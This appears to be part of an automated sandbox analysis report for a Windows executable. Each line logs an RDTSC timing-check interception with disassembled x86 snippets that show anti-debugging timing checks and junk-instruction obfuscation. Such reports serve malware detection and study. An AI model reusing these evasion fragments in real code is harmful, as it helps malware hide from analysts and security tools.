                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0EBB second address: 5C0EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C0EBF second address: 5C0EC9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57CD4ECF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C6B1E second address: 5C6B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57C52C329h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5C6B3D second address: 5C6B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 595F3A second address: 595F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC57C52C325h 0x0000000e jg 00007FC57C52C316h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB862 second address: 5CB879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ED03h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB879 second address: 5CB88F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC57C52C31Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB88F second address: 5CB89F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB89F second address: 5CB8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB8A4 second address: 5CB8AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CADF3 second address: 5CAE3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC57C52C329h 0x0000000f push esi 0x00000010 jmp 00007FC57C52C31Ah 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CAE3D second address: 5CAE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CAE41 second address: 5CAE5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Eh 0x00000007 jns 00007FC57C52C316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB381 second address: 5CB3CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FC57CD4ED07h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007FC57CD4ECFEh 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e jnl 00007FC57CD4ECF6h 0x00000024 push edx 0x00000025 pop edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB6FD second address: 5CB708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC57C52C316h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB708 second address: 5CB70E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB70E second address: 5CB712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CB712 second address: 5CB71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEC82 second address: 5CECA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC57C52C322h 0x00000008 jo 00007FC57C52C316h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CECA6 second address: 5CECAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEE1A second address: 5CEE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEFEE second address: 5CEFF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CEFF2 second address: 5CEFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CF2F1 second address: 5CF2F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CF2F7 second address: 5CF30E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC57C52C31Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CF30E second address: 5CF314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CFA3F second address: 5CFA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CFBCF second address: 5CFBD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CFC98 second address: 5CFC9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D0CD7 second address: 5D0CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FC57CD4ECFDh 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D3021 second address: 5D3025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D3025 second address: 5D30CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC57CD4ECF8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, 712391D9h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c sub dword ptr [ebp+12449B5Bh], eax 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FC57CD4ECF8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f pushad 0x00000050 sub eax, 5D905E20h 0x00000056 jo 00007FC57CD4ED0Bh 0x0000005c jmp 00007FC57CD4ED05h 0x00000061 popad 0x00000062 push eax 0x00000063 jnp 00007FC57CD4ED2Bh 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FC57CD4ED07h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D38C6 second address: 5D38DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 ja 00007FC57C52C316h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D38DA second address: 5D38DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D567D second address: 5D5683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D5683 second address: 5D5687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 58A14D second address: 58A17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 jmp 00007FC57C52C329h 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D5DAE second address: 5D5DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D5DB2 second address: 5D5DBC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC57C52C31Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D684C second address: 5D6851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D6639 second address: 5D663D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D6851 second address: 5D6856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D6856 second address: 5D691A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57C52C316h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jnp 00007FC57C52C33Ah 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FC57C52C318h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f movzx esi, di 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D1BFEh] 0x0000003a mov si, EB32h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007FC57C52C318h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 0000001Ah 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a jmp 00007FC57C52C328h 0x0000005f xchg eax, ebx 0x00000060 jmp 00007FC57C52C326h 0x00000065 push eax 0x00000066 pushad 0x00000067 js 00007FC57C52C31Ch 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DA79B second address: 5DA7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D9A03 second address: 5D9A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DA92F second address: 5DA939 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5D9A08 second address: 5D9A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DA939 second address: 5DA9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007FC57CD4ECF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f call 00007FC57CD4ECFFh 0x00000014 pop ebx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jmp 00007FC57CD4ED08h 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov ebx, dword ptr [ebp+122D36E2h] 0x0000002e mov eax, dword ptr [ebp+122D09D1h] 0x00000034 mov dword ptr [ebp+122D1C9Bh], eax 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FC57CD4ECF8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 nop 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FC57CD4ED05h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DB8EC second address: 5DB8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DD87C second address: 5DD886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC57CD4ECF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DB8F0 second address: 5DB8F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DD886 second address: 5DD8E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FC57CD4ECFAh 0x0000000f nop 0x00000010 xor bl, 0000006Dh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FC57CD4ECF8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub bh, FFFFFFE1h 0x00000032 jmp 00007FC57CD4ED07h 0x00000037 push 00000000h 0x00000039 sbb di, 7CA1h 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DC9CF second address: 5DC9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DC9D3 second address: 5DC9F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007FC57CD4ED01h 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DDA60 second address: 5DDA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE5D0 second address: 5DE5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC57CD4ECFCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DDA66 second address: 5DDA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE5F8 second address: 5DE60E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jns 00007FC57CD4ECF6h 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE80B second address: 5DE81A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE81A second address: 5DE81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DE81F second address: 5DE824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E17E9 second address: 5E181B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED06h 0x00000007 ja 00007FC57CD4ECF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007FC57CD4ED00h 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E181B second address: 5E183F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC57C52C322h 0x00000008 pushad 0x00000009 jmp 00007FC57C52C31Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF7F0 second address: 5DF7F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF7F7 second address: 5DF80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF80A second address: 5DF882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 cmc 0x00000009 jmp 00007FC57CD4ECFCh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FC57CD4ECF8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov eax, dword ptr [ebp+122D0BB5h] 0x0000003c mov dword ptr [ebp+1244ECC7h], edi 0x00000042 push FFFFFFFFh 0x00000044 or edi, dword ptr [ebp+122D1A31h] 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007FC57CD4ED06h 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5DF882 second address: 5DF8A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FC57C52C316h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E40A2 second address: 5E40A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E302F second address: 5E3033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E81CF second address: 5E81EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FC57CD4ECF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5E92F3 second address: 5E92F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA3D0 second address: 5EA3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA3D4 second address: 5EA3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5EA3D8 second address: 5EA3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5EA54C second address: 5EA5FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC57C52C327h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 movsx edi, cx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jmp 00007FC57C52C325h 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FC57C52C318h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 xor edi, dword ptr [ebp+122D214Ch] 0x00000048 mov eax, dword ptr [ebp+122D15B1h] 0x0000004e stc 0x0000004f push FFFFFFFFh 0x00000051 call 00007FC57C52C328h 0x00000056 mov bx, ax 0x00000059 pop edi 0x0000005a nop 0x0000005b pushad 0x0000005c jnc 00007FC57C52C318h 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 jne 00007FC57C52C316h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5EA5FC second address: 5EA614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC57CD4ECFEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5F0553 second address: 5F0559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
